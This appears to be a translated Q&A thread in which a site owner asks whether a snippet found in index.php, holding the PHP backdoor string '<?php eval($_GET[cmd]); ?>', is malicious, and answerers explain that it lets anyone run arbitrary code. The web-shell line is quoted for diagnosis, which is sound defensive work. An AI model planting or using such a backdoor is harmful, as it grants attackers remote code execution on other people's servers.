-1

我在我的网站 index.php 中找到了这段代码

<script type="text/javascript">
  new.track("new.dev","_browser","'<?php eval($_GET[cmd]); ?>', '<?php eval($_GET[cmd]);?>'");
  new.track("new.dev","_url",location.href);
</script>

那个代码是恶意的吗?从网络上,我尝试输入 index.php?cmd=ls 之类的东西,但什么也没出现。也许它需要在页面上?我试图了解以前的管理员在现场做什么。

4

2 回答 2

4

该代码中存在无穷无尽的风险。eval() 运行 php 命令并且可以运行终端命令。如果您在没有卫生条件的情况下接受输入,那么有人可能会发疯并在那里造成严重伤害。我会立即删除它并找到更好的方法。

也把写它的那个人搞砸了。

于 2012-11-16T14:09:05.780 回答
0

1) 引用cmd=>$_GET['cmd']

2)绝对允许任何用户在您的服务器上执行任何一段 php 代码。不过,get 请求默认限制为 8kb(限制可能会更改)

你正在做的事情非常危险。我不确定您想要完成什么,但请相信我并找到不同的方式。

于 2012-11-16T14:09:41.470 回答